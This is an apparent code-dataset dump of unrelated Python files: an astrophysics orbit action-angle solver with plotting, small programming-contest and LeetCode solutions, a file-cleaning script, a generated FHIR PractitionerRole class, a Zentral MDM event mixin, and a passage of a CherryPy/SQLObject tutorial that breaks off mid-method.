    omega = toy.findbestparams_ho(results)
    if(ifprint):
        print("Best omega "+str(omega)+" found in "+str(time.time()-t)+" seconds")

    # Now find toy actions and angles
    AA = np.array([toy.angact_ho(i,omega) for i in results])
    AA = AA[~np.isnan(AA).any(1)]  # drop samples where the toy transform failed
    if(len(AA)==0):
        return

    t = time.time()
    act = solver.solver(AA, N_matrix)
    # BUGFIX: use `is None` -- the success value is a tuple containing
    # numpy arrays, for which `== None` only works by accident.
    if act is None:
        return

    if(ifprint):
        print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")

    # Persist the generating-function coefficients alongside their modes.
    np.savetxt("GF.Sn_box",np.vstack((act[1].T,act[0][3:])).T)

    ang = solver.angle_solver(AA,times,N_matrix,np.ones(3))
    if(ifprint):
        print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")

    # Just some checks
    if(len(ang)>len(AA)):
        print("More unknowns than equations")

    return act[0], ang, act[1], AA, omega
def loop_actions(results, times, N_matrix, ifprint):
    """
    Finds actions, angles and frequencies for loop orbit.
    Takes a series of phase-space points from an orbit integration at times t and returns
    L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
    results must be oriented such that circulation is about the z-axis.
    Returns None when the toy transform or the linear solver fails.
    """
    if(ifprint):
        print("\n=====\nUsing isochrone toy potential")

    t = time.time()
    # First find the best set of toy parameters
    params = toy.findbestparams_iso(results)
    if(params[0]!=params[0]):  # NaN guard (NaN != NaN); fall back to defaults
        params = np.array([10.,10.])
    if(ifprint):
        print("Best params "+str(params)+" found in "+str(time.time()-t)+" seconds")

    # Now find the toy angles and actions in this potential
    AA = np.array([toy.angact_iso(i,params) for i in results])
    AA = AA[~np.isnan(AA).any(1)]  # drop samples where the toy transform failed
    if(len(AA)==0):
        return

    t = time.time()
    act = solver.solver(AA, N_matrix,symNx = 1)
    # BUGFIX: use `is None` -- the success value is a tuple containing
    # numpy arrays, for which `== None` only works by accident.
    if act is None:
        return
    if(ifprint):
        print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")

    # Store Sn
    np.savetxt("GF.Sn_loop",np.vstack((act[1].T,act[0][3:])).T)

    # Find angles; the sign of the z angular momentum at the first sample
    # sets the sense of circulation for the angle solution.
    sign = np.array([1.,np.sign(results[0][0]*results[0][4]-results[0][1]*results[0][3]),1.])
    ang = solver.angle_solver(AA,times,N_matrix,sign,symNx = 1)
    if(ifprint):
        print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")

    # Just some checks
    if(len(ang)>len(AA)):
        print("More unknowns than equations")

    return act[0], ang, act[1], AA, params
def angmom(x):
    """Angular momentum L = r x v of a phase-space point x = (x,y,z,vx,vy,vz)."""
    rx, ry, rz, vx, vy, vz = x[0], x[1], x[2], x[3], x[4], x[5]
    return np.array([ry * vz - rz * vy,
                     rz * vx - rx * vz,
                     rx * vy - ry * vx])
def assess_angmom(X):
    """
    Classify an orbit by whether each angular-momentum component keeps a
    constant sign along the time series X (relative to the first point).
    Entry i of the result is 1 if component i never changes sign, else 0.
    Box = (0,0,0)
    S.A loop = (0,0,1)
    L.A loop = (1,0,0)
    """
    def _L(p):
        # Angular momentum r x v of a single phase-space point (inlined
        # so this routine is self-contained).
        return np.array([p[1]*p[5] - p[2]*p[4],
                         p[2]*p[3] - p[0]*p[5],
                         p[0]*p[4] - p[1]*p[3]])

    L0 = _L(X[0])
    conserved = np.array([1, 1, 1])
    for point in X[1:]:
        Li = _L(point)
        for k in range(3):
            # A negative product means the component flipped sign.
            if Li[k] * L0[k] < 0.:
                conserved[k] = 0
    return conserved
def flip_coords(X,loop):
    """ Align circulation with z-axis.

    If the orbit circulates about the long (x) axis (loop[0] == 1), swap
    the x and z position and velocity components of every phase-space
    point and return the result as a 2-D array; otherwise return X as-is.
    """
    if(loop[0]==1):
        # BUGFIX: use a list comprehension instead of map(). Under
        # Python 3, map() returns an iterator and np.array(map(...))
        # silently produces a 0-d object array instead of the intended
        # (N, 6) array. Behaviour under Python 2 is unchanged.
        return np.array([np.array([i[2], i[1], i[0], i[5], i[4], i[3]])
                         for i in X])
    else:
        return X
def find_actions(results, t, N_matrix=8, use_box=False, ifloop=False, ifprint = True):
    """
    Main routine:
    Takes a series of phase-space points from an orbit integration at times t and returns
    L = (act,ang,n_vec,toy_aa, pars) where act is the actions, ang the initial angles and
    frequencies, n_vec the n vectors of the Fourier modes, toy_aa the toy action-angle
    coords, and pars are the toy potential parameters

    N_matrix sets the maximum |n| of the Fourier modes used,
    use_box forces the routine to use the triaxial harmonic oscillator as the toy potential,
    ifloop=True returns orbit classification,
    ifprint=True prints progress messages.
    """
    # Determine orbit class
    loop = assess_angmom(results)
    arethereloops = np.any(loop>0)
    if(arethereloops and not use_box):
        L = loop_actions(flip_coords(results,loop),t,N_matrix, ifprint)
        # BUGFIX: `is None` rather than `== None` -- the success value is
        # a tuple containing numpy arrays, for which equality comparison
        # with None only works by accident.
        if L is None:
            if(ifprint):
                print("Failed to find actions for this orbit")
            return
        # Used for switching J_2 and J_3 for long-axis loop orbits
        # This is so the orbit classes form a continuous plane in action space
        # if(loop[0]):
        #     L[0][1],L[0][2]=L[0][2],L[0][1]
        #     L[1][1],L[1][2]=L[1][2],L[1][1]
        #     L[1][4],L[1][5]=L[1][5],L[1][4]
        #     L[3].T[1],L[3].T[2]=L[3].T[2],L[3].T[1]
    else:
        L = box_actions(results,t,N_matrix, ifprint)
        if L is None:
            if(ifprint):
                print("Failed to find actions for this orbit")
            return
    if(ifloop):
        return L,loop
    else:
        return L
###################
# Plotting tests #
###################
from .solver import check_each_direction as ced
def plot_Sn_timesamples(PSP):
    """ Plots Fig. 5 from Sanders & Binney (2014): accuracy of the
        recovered J_3 and Omega_3 for a box orbit (initial condition PSP)
        as a function of N_max, for several integration-window lengths. """
    TT = pot.stackel_triax()
    f,a = plt.subplots(2,1,figsize=[3.32,3.6])
    plt.subplots_adjust(hspace=0.,top=0.8)
    # Shortest fundamental period of this orbit (sets the time unit T_F).
    LowestPeriod = 2.*np.pi/38.86564386
    Times = np.array([2.,4.,8.,12.])
    Sr = np.arange(2,14,2)
    # Loop over length of integration window
    for i,P,C in zip(Times,['.','s','D','^'],['k','r','b','g']):
        diffact = np.zeros((len(Sr),3))
        difffreq = np.zeros((len(Sr),3))
        MAXGAPS = np.array([])
        # Loop over N_max
        for k,j in enumerate(Sr):
            NT = choose_NT(j)
            timeseries=np.linspace(0.,i*LowestPeriod,NT)
            results = odeint(pot.orbit_derivs2,PSP,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
            act,ang,n_vec,toy_aa, pars = find_actions(results, timeseries,N_matrix=j,ifprint=False,use_box=True)
            # Check all modes
            checks,maxgap = ced(n_vec,ua(toy_aa.T[3:].T,np.ones(3)))
            if len(maxgap)>0:
                maxgap = np.max(maxgap)
            else:
                maxgap = 0
            # Ratio of recovered to true actions/frequencies (1 = perfect).
            diffact[k] = act[:3]/TT.action(results[0])
            MAXGAPS = np.append(MAXGAPS,maxgap)
            difffreq[k] = ang[3:6]/TT.freq(results[0])
        size = 15
        if(P=='.'):
            size = 30
        # Marker edge width encodes the largest unconstrained-mode gap.
        # NOTE: Python 2 map() (returns a list); would need list() under Py3.
        LW = np.array(map(lambda i: 0.5+i*0.5, MAXGAPS))
        a[0].scatter(Sr,np.log10(np.abs(diffact.T[2]-1)),marker=P,s=size, color=C,facecolors="none",lw=LW,label=r'$T =\,$'+str(i)+r'$\,T_F$')
        a[1].scatter(Sr,np.log10(np.abs(difffreq.T[2]-1)),marker=P,s=size, color=C,facecolors="none", lw=LW)
    a[1].get_yticklabels()[-1].set_visible(False)
    a[0].set_xticklabels([])
    a[0].set_xlim(1,13)
    a[0].set_ylabel(r"$\log_{10}|J_3^\prime/J_{3, \rm true}-1|$")
    leg = a[0].legend(loc='upper center',bbox_to_anchor=(0.5,1.4),ncol=2, scatterpoints = 1)
    leg.draw_frame(False)
    a[1].set_xlim(1,13)
    a[1].set_xlabel(r'$N_{\rm max}$')
    a[1].set_ylabel(r"$\log_{10}|\Omega_3^\prime/\Omega_{3,\rm true}-1|$")
    plt.savefig('Sn_T_box.pdf',bbox_inches='tight')
def plot3D_stacktriax(initial,final_t,N_MAT,file_output):
    """ For producing plots from paper.

        Integrates the orbit with initial phase-space point `initial` for
        time `final_t` in the triaxial Staeckel potential, recovers its
        actions/angles with N_max = N_MAT, draws the summary figure to
        `file_output` and returns the action solution `act`. """
    # Setup Stackel potential
    TT = pot.stackel_triax()
    times = choose_NT(N_MAT)
    timeseries=np.linspace(0.,final_t,times)
    # Integrate orbit
    results = odeint(pot.orbit_derivs2,initial,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
    # Find actions, angles and frequencies
    (act,ang,n_vec,toy_aa, pars),loop = find_actions(results, timeseries,N_matrix=N_MAT,ifloop=True)
    # Rebuild the toy potential used by find_actions (isochrone for loop
    # orbits, harmonic oscillator for box orbits).
    toy_pot = 0
    if(loop[2]>0.5 or loop[0]>0.5):
        toy_pot = pot.isochrone(par=np.append(pars,0.))
    else:
        toy_pot = pot.harmonic_oscillator(omega=pars[:3])
    # Integrate initial condition in toy potential
    timeseries_2=np.linspace(0.,2.*final_t,3500)
    results_toy = odeint(pot.orbit_derivs2,initial,timeseries_2,args=(toy_pot,))
    # and plot
    f,a = plt.subplots(2,3,figsize=[3.32,5.5])
    a[0,0] = plt.subplot2grid((3,2), (0, 0))
    a[1,0] = plt.subplot2grid((3,2), (0, 1))
    a[0,1] = plt.subplot2grid((3,2), (1, 0))
    a[1,1] = plt.subplot2grid((3,2), (1, 1))
    a[0,2] = plt.subplot2grid((3,2), (2, 0),colspan=2)
    plt.subplots_adjust(wspace=0.5,hspace=0.45)
    # xy orbit
    a[0,0].plot(results.T[0],results.T[1],'k')
    a[0,0].set_xlabel(r'$x/{\rm kpc}$')
    a[0,0].set_ylabel(r'$y/{\rm kpc}$')
    a[0,0].xaxis.set_major_locator(MaxNLocator(5))
    # xz orbit
    a[1,0].plot(results.T[0],results.T[2],'k')
    a[1,0].set_xlabel(r'$x/{\rm kpc}$')
    a[1,0].set_ylabel(r'$z/{\rm kpc}$')
    a[1,0].xaxis.set_major_locator(MaxNLocator(5))
    # toy orbits
    a[0,0].plot(results_toy.T[0],results_toy.T[1],'r',alpha=0.2,linewidth=0.3)
    a[1,0].plot(results_toy.T[0],results_toy.T[2],'r',alpha=0.2,linewidth=0.3)
    # Toy actions
    a[0,2].plot(Conv*timeseries,toy_aa.T[0],'k:',label='Toy action')
    a[0,2].plot(Conv*timeseries,toy_aa.T[1],'r:')
    a[0,2].plot(Conv*timeseries,toy_aa.T[2],'b:')
    # Arrows to show approx. actions
    arrow_end = a[0,2].get_xlim()[1]
    arrowd = 0.08*(arrow_end-a[0,2].get_xlim()[0])
    a[0,2].annotate('',(arrow_end+arrowd,act[0]),(arrow_end,act[0]),arrowprops=dict(arrowstyle='<-',color='k'),annotation_clip=False)
    a[0,2].annotate('',(arrow_end+arrowd,act[1]),(arrow_end,act[1]),arrowprops=dict(arrowstyle='<-',color='r'),annotation_clip=False)
    a[0,2].annotate('',(arrow_end+arrowd,act[2]),(arrow_end,act[2]),arrowprops=dict(arrowstyle='<-',color='b'),annotation_clip=False)
    # True actions
    a[0,2].plot(Conv*timeseries,TT.action(results[0])[0]*np.ones(len(timeseries)),'k',label='True action')
    a[0,2].plot(Conv*timeseries,TT.action(results[0])[1]*np.ones(len(timeseries)),'k')
    a[0,2].plot(Conv*timeseries,TT.action(results[0])[2]*np.ones(len(timeseries)),'k')
    a[0,2].set_xlabel(r'$t/{\rm Gyr}$')
    a[0,2].set_ylabel(r'$J/{\rm kpc\,km\,s}^{-1}$')
    leg = a[0,2].legend(loc='upper center',bbox_to_anchor=(0.5,1.2),ncol=3, numpoints = 1)
    leg.draw_frame(False)
    # Toy angle coverage
    a[0,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[4]/(np.pi),'k.',markersize=0.4)
    a[0,1].set_xlabel(r'$\theta_1/\pi$')
    a[0,1].set_ylabel(r'$\theta_2/\pi$')
    a[1,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[5]/(np.pi),'k.',markersize=0.4)
    a[1,1].set_xlabel(r'$\theta_1/\pi$')
    a[1,1].set_ylabel(r'$\theta_3/\pi$')
    plt.savefig(file_output,bbox_inches='tight')
    return act
if __name__=="__main__":
    # Initial phase-space conditions (x, y, z, vx, vy, vz) for each orbit
    # class, in units of kpc and km/s.
    BoxP = np.array([0.1,0.1,0.1,142.,140.,251.])
    LoopP = np.array([10.,1.,8.,40.,152.,63.])
    ResP = np.array([0.1,0.1,0.1,142.,150.,216.5])
    LongP = np.array([-0.5,18.,0.5,25.,20.,-133.1])
    # Short-axis Loop
    LowestPeriodLoop = 2*np.pi/15.30362865
    # Fig 1
    loop = plot3D_stacktriax(LoopP,8*LowestPeriodLoop,6,'genfunc_3d_example_LT_Stack_Loop.pdf')
    # Fig 3
    vs.Sn_plots('GF.Sn_loop','loop',loop,1)
    # Box
    LowestPeriodBox = 2.*np.pi/38.86564386
    # Fig 2
    box = plot3D_stacktriax(BoxP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Box.pdf')
    # Fig 4
    vs.Sn_plots('GF.Sn_box','box',box,0)
    # Res
    LowestPeriodRes = 2.*np.pi/42.182
    # Fig 5
    # NOTE(review): this call reuses LowestPeriodBox rather than
    # LowestPeriodRes -- possibly intentional, but worth confirming.
    res = plot3D_stacktriax(ResP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Res.pdf')
    # vs.Sn_plots('GF.Sn_box','box',res,0)
    # Long-axis loop
    # NOTE(review): LongP / LowestPeriodLong are defined but never used here.
    LowestPeriodLong = 2.*np.pi/12.3
| [
"adrian.prw@gmail.com"
] | adrian.prw@gmail.com |
8b225ee618d2c0e039ce2c2d41cf4951ba7b6028 | c1c5a8dc79cacf3b419bad77881213c5db2f80c3 | /Kattis/Hangman.py | 540add223680299e4c243eee7ae10b1621c955f5 | [] | no_license | EoinDavey/Competitive | 7ff8b6b6225814ac60c3ace659bb63190eb52420 | b2b6909b93f5c073b684477f8a4b06dac22ec678 | refs/heads/master | 2023-01-08T00:06:19.076941 | 2022-12-26T14:00:31 | 2022-12-26T14:00:31 | 67,259,478 | 17 | 1 | null | 2022-01-19T18:17:59 | 2016-09-02T22:46:26 | C++ | UTF-8 | Python | false | false | 189 | py | w = set(raw_input())
r = set()
s = raw_input()
i = 0
for c in s:
if c in w:
r.add(c)
else:
i+=1
if len(r) == len(w):
break
if i < 10:
print "WIN"
else:
print "LOSE"
| [
"eoind@vey.ie"
] | eoind@vey.ie |
05e85c0919ad2a4b88eaf3953a840091332c7133 | a0f55e31c92c31832fbe074038f07b8f8726425b | /Python/Python编程实践gwpy2-code/code/fileproc/inception_readlines.py | 1e43a6ab8998312ebdc7d1dc31948d9364a4b3e1 | [
"MIT"
] | permissive | jjc521/E-book-Collection | 7533717250395a8b81163564eef821e66bae5202 | b18bf6630bf99b7bf19b4cc4450b67887f618d31 | refs/heads/master | 2023-03-15T23:48:49.018347 | 2019-08-30T07:26:01 | 2019-08-30T07:26:01 | 206,090,622 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | with open('file_example.txt', 'r') as example_file:
lines = example_file.readlines()
print(lines)
| [
"907097904@qq.com"
] | 907097904@qq.com |
d03b9dea06bfefc925406420ce6441c7af6a6826 | 3da69696601b2b3ad7bc1285a5f0343c7eafea80 | /lc417.py | 4fde0896c49f578ad3744a0571ca5a994537d5c7 | [] | no_license | GeorgyZhou/Leetcode-Problem | ee586463a2e4e75c910c095bdc057f1be70b5c1b | d6fac85a94a7188e93d4e202e67b6485562d12bd | refs/heads/master | 2021-06-30T15:58:04.698200 | 2020-12-18T22:55:49 | 2020-12-18T22:55:49 | 66,054,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | class Solution(object):
def pacificAtlantic(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
import heapq
row = len(matrix)
if row == 0:
return []
col = len(matrix[0])
if col == 0:
return []
ret = []
pac = dict()
alt = dict()
heapalt = []
heappac = []
pacvisited = dict()
altvisited = dict()
for i in xrange(row):
pac[(i,0)] = 1
pacvisited[(i,0)] = 1
alt[(i,col-1)] = 1
altvisited[(i, col-1)] = 1
heapq.heappush(heapalt, (matrix[i][col-1], i, col-1))
heapq.heappush(heappac, (matrix[i][0], i, 0))
for j in xrange(1, col):
pac[(0,j)] = 1
pacvisited[(0, j)] = 1
alt[(row-1, col-1-j)] = 1
altvisited[(row-1, col-1-j)] = 1
heapq.heappush(heappac, (matrix[0][j], 0, j))
heapq.heappush(heapalt, (matrix[row-1][col-1-j], row-1, col-1-j))
while len(heappac) > 0:
height, i, j = heapq.heappop(heappac)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not pacvisited.has_key((x, y)) and height <= matrix[x][y]:
pac[(x,y)] = 1
heapq.heappush(heappac, (matrix[x][y], x, y))
pacvisited[(x,y)] = 1
while len(heapalt) > 0:
height, i, j = heapq.heappop(heapalt)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not altvisited.has_key((x, y)) and height <= matrix[x][y]:
alt[(x,y)] = 1
heapq.heappush(heapalt, (matrix[x][y], x, y))
altvisited[(x,y)] = 1
for x in xrange(row):
for y in xrange(col):
if alt.has_key((x, y)) and pac.has_key((x, y)):
ret.append([x, y])
return ret
| [
"michaelchouqj@gmail.com"
] | michaelchouqj@gmail.com |
cf9536970a1d384e5d71709808001cf25fb90dc5 | 39e1e256acae3fe9be4434024d42b9bb47bdd02f | /analysis/submissions/844088c7077d499fa3533250ae504e7f_task2-2_1595958872/task2-2/main_patch.py | 9487fafad846fe1eb836cae4a61d574d42fae035 | [] | no_license | neulab/tranx-study | 9fb67b9a2181f0b362e4f97316c502eee4539b19 | e2a7089689f7f95e773e19c8f19513abe4fb8b9b | refs/heads/master | 2023-06-14T04:46:01.010892 | 2021-07-08T09:29:05 | 2021-07-08T09:29:05 | 250,357,553 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | from os import listdir
from os.path import isfile, join
from shutil import copyfile
def clean(file):
with open(file, 'r', encoding="ISO-8859-1") as f:
print(file)
return '\n'.join([line for line in f.read().strip().splitlines()]).encode('utf-8')
for fname in listdir('data/'):
fpath = join('data/', fname)
if isfile(fpath):
output_path = join('output/', fname)
if fpath.endswith('.txt'):
with open(output_path, 'wb') as out_f:
out_f.write(clean(fpath))
else:
copyfile(fpath, output_path)
| [
"frankxu2004@gmail.com"
] | frankxu2004@gmail.com |
c3f3e68e88d865e2a783eb6a940e63f3c9138e80 | be61a9f30274514857ea34297719157f1e5b8447 | /fhir/resources/practitionerrole.py | 93992fb6288c5beb51b23d862239f67f18b278e5 | [
"BSD-3-Clause"
] | permissive | jwygoda/fhir.resources | ceff3a620100d2e875136b86d3e82816c0e60a33 | 5053565570d1ca992d9971d20db813c53fd350b9 | refs/heads/master | 2021-02-05T02:59:17.436485 | 2019-07-18T10:57:33 | 2019-07-18T10:57:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,907 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/PractitionerRole) on 2019-05-13.
# 2019, SMART Health IT.
from . import domainresource
class PractitionerRole(domainresource.DomainResource):
""" Roles/organizations the practitioner is associated with.
A specific set of Roles/Locations/specialties/services that a practitioner
may perform at an organization for a period of time.
"""
resource_type = "PractitionerRole"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.active = None
""" Whether this practitioner role record is in active use.
Type `bool`. """
self.availabilityExceptions = None
""" Description of availability exceptions.
Type `str`. """
self.availableTime = None
""" Times the Service Site is available.
List of `PractitionerRoleAvailableTime` items (represented as `dict` in JSON). """
self.code = None
""" Roles which this practitioner may perform.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.endpoint = None
""" Technical endpoints providing access to services operated for the
practitioner with this role.
List of `FHIRReference` items (represented as `dict` in JSON). """
self.healthcareService = None
""" The list of healthcare services that this worker provides for this
role's Organization/Location(s).
List of `FHIRReference` items (represented as `dict` in JSON). """
self.identifier = None
""" Business Identifiers that are specific to a role/location.
List of `Identifier` items (represented as `dict` in JSON). """
self.location = None
""" The location(s) at which this practitioner provides care.
List of `FHIRReference` items (represented as `dict` in JSON). """
self.notAvailable = None
""" Not available during this time due to provided reason.
List of `PractitionerRoleNotAvailable` items (represented as `dict` in JSON). """
self.organization = None
""" Organization where the roles are available.
Type `FHIRReference` (represented as `dict` in JSON). """
self.period = None
""" The period during which the practitioner is authorized to perform
in these role(s).
Type `Period` (represented as `dict` in JSON). """
self.practitioner = None
""" Practitioner that is able to provide the defined services for the
organization.
Type `FHIRReference` (represented as `dict` in JSON). """
self.specialty = None
""" Specific specialty of the practitioner.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.telecom = None
""" Contact details that are specific to the role/location/service.
List of `ContactPoint` items (represented as `dict` in JSON). """
super(PractitionerRole, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(PractitionerRole, self).elementProperties()
js.extend([
("active", "active", bool, "boolean", False, None, False),
("availabilityExceptions", "availabilityExceptions", str, "string", False, None, False),
("availableTime", "availableTime", PractitionerRoleAvailableTime, "PractitionerRoleAvailableTime", True, None, False),
("code", "code", codeableconcept.CodeableConcept, "CodeableConcept", True, None, False),
("endpoint", "endpoint", fhirreference.FHIRReference, "Reference", True, None, False),
("healthcareService", "healthcareService", fhirreference.FHIRReference, "Reference", True, None, False),
("identifier", "identifier", identifier.Identifier, "Identifier", True, None, False),
("location", "location", fhirreference.FHIRReference, "Reference", True, None, False),
("notAvailable", "notAvailable", PractitionerRoleNotAvailable, "PractitionerRoleNotAvailable", True, None, False),
("organization", "organization", fhirreference.FHIRReference, "Reference", False, None, False),
("period", "period", period.Period, "Period", False, None, False),
("practitioner", "practitioner", fhirreference.FHIRReference, "Reference", False, None, False),
("specialty", "specialty", codeableconcept.CodeableConcept, "CodeableConcept", True, None, False),
("telecom", "telecom", contactpoint.ContactPoint, "ContactPoint", True, None, False),
])
return js
from . import backboneelement
class PractitionerRoleAvailableTime(backboneelement.BackboneElement):
""" Times the Service Site is available.
A collection of times the practitioner is available or performing this role
at the location and/or healthcareservice.
"""
resource_type = "PractitionerRoleAvailableTime"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.allDay = None
""" Always available? e.g. 24 hour service.
Type `bool`. """
self.availableEndTime = None
""" Closing time of day (ignored if allDay = true).
Type `FHIRDate` (represented as `str` in JSON). """
self.availableStartTime = None
""" Opening time of day (ignored if allDay = true).
Type `FHIRDate` (represented as `str` in JSON). """
self.daysOfWeek = None
""" mon | tue | wed | thu | fri | sat | sun.
List of `str` items. """
super(PractitionerRoleAvailableTime, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(PractitionerRoleAvailableTime, self).elementProperties()
js.extend([
("allDay", "allDay", bool, "boolean", False, None, False),
("availableEndTime", "availableEndTime", fhirdate.FHIRDate, "time", False, None, False),
("availableStartTime", "availableStartTime", fhirdate.FHIRDate, "time", False, None, False),
("daysOfWeek", "daysOfWeek", str, "code", True, None, False),
])
return js
class PractitionerRoleNotAvailable(backboneelement.BackboneElement):
""" Not available during this time due to provided reason.
The practitioner is not available or performing this role during this
period of time due to the provided reason.
"""
resource_type = "PractitionerRoleNotAvailable"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.description = None
""" Reason presented to the user explaining why time not available.
Type `str`. """
self.during = None
""" Service not available from this date.
Type `Period` (represented as `dict` in JSON). """
super(PractitionerRoleNotAvailable, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(PractitionerRoleNotAvailable, self).elementProperties()
js.extend([
("description", "description", str, "string", False, None, True),
("during", "during", period.Period, "Period", False, None, False),
])
return js
import sys
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + '.codeableconcept']
try:
from . import contactpoint
except ImportError:
contactpoint = sys.modules[__package__ + '.contactpoint']
try:
from . import fhirdate
except ImportError:
fhirdate = sys.modules[__package__ + '.fhirdate']
try:
from . import fhirreference
except ImportError:
fhirreference = sys.modules[__package__ + '.fhirreference']
try:
from . import identifier
except ImportError:
identifier = sys.modules[__package__ + '.identifier']
try:
from . import period
except ImportError:
period = sys.modules[__package__ + '.period']
| [
"connect2nazrul@gmail.com"
] | connect2nazrul@gmail.com |
4814556209a63b3749122e9e8c239c4aabab5d69 | 75402b6c851a12ae41359fdd83e89d2160c308af | /zentral/contrib/mdm/views/base.py | e87ecd36b7d41addde0cb28c75645741a6dd1b1d | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] | permissive | neocode12/zentral | 7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71 | 9ecc8d8334148627fcccaa875f100adacd7a018b | refs/heads/main | 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 | Apache-2.0 | 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null | UTF-8 | Python | false | false | 1,481 | py | from django.core.exceptions import SuspiciousOperation
from zentral.utils.http import user_agent_and_ip_address_from_request
class PostEventMixin:
_setup_done = False
def dispatch(self, request, *args, **kwargs):
self.setup_with_request(request)
return super().dispatch(request, *args, **kwargs)
def setup_with_request(self, request):
if not self._setup_done:
self.user_agent, self.ip = user_agent_and_ip_address_from_request(request)
self.serial_number = self.udid = None
self.realm_user = None
self._setup_done = True
def post_event(self, status, **event_payload):
event_payload["status"] = status
if self.udid:
event_payload["udid"] = self.udid
if self.realm_user:
realm = self.realm_user.realm
event_payload["realm"] = {"pk": str(realm.pk),
"name": realm.name}
event_payload["realm_user"] = {"pk": str(self.realm_user.pk),
"username": self.realm_user.username}
self.event_class.post_machine_request_payloads(self.serial_number, self.user_agent, self.ip,
[event_payload])
def abort(self, reason, **event_payload):
if reason:
event_payload["reason"] = reason
self.post_event("failure", **event_payload)
raise SuspiciousOperation
| [
"eric.falconnier@112hz.com"
] | eric.falconnier@112hz.com |
57b0f77bec4f7eec3adf821f20ae402b5af51d66 | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve-8.51.857815/carbon/common/lib/cherrypy/tutorial/bonus-sqlobject.py | 28b698ecccf4841092d2c84d53dee0097cbcc5cf | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,502 | py | #Embedded file name: carbon/common/lib/cherrypy/tutorial\bonus-sqlobject.py
"""
Bonus Tutorial: Using SQLObject
This is a silly little contacts manager application intended to
demonstrate how to use SQLObject from within a CherryPy2 project. It
also shows how to use inline Cheetah templates.
SQLObject is an Object/Relational Mapper that allows you to access
data stored in an RDBMS in a pythonic fashion. You create data objects
as Python classes and let SQLObject take care of all the nasty details.
This code depends on the latest development version (0.6+) of SQLObject.
You can get it from the SQLObject Subversion server. You can find all
necessary information at <http://www.sqlobject.org>. This code will NOT
work with the 0.5.x version advertised on their website!
This code also depends on a recent version of Cheetah. You can find
Cheetah at <http://www.cheetahtemplate.org>.
After starting this application for the first time, you will need to
access the /reset URI in order to create the database table and some
sample data. Accessing /reset again will drop and re-create the table,
so you may want to be careful. :-)
This application isn't supposed to be fool-proof, it's not even supposed
to be very GOOD. Play around with it some, browse the source code, smile.
:)
-- Hendrik Mans <hendrik@mans.de>
"""
import cherrypy
from Cheetah.Template import Template
from sqlobject import *
__connection__ = 'mysql://root:@localhost/test'
class Contact(SQLObject):
lastName = StringCol(length=50, notNone=True)
firstName = StringCol(length=50, notNone=True)
phone = StringCol(length=30, notNone=True, default='')
email = StringCol(length=30, notNone=True, default='')
url = StringCol(length=100, notNone=True, default='')
class ContactManager:
def index(self):
contacts = Contact.select()
template = Template('\n <h2>All Contacts</h2>\n\n #for $contact in $contacts\n <a href="mailto:$contact.email">$contact.lastName, $contact.firstName</a>\n [<a href="./edit?id=$contact.id">Edit</a>]\n [<a href="./delete?id=$contact.id">Delete</a>]\n <br/>\n #end for\n\n <p>[<a href="./edit">Add new contact</a>]</p>\n ', [locals(), globals()])
return template.respond()
index.exposed = True
def edit(self, id = 0):
id = int(id)
if id > 0:
contact = Contact.get(id)
title = 'Edit Contact'
else:
contact = None
title = 'New Contact'
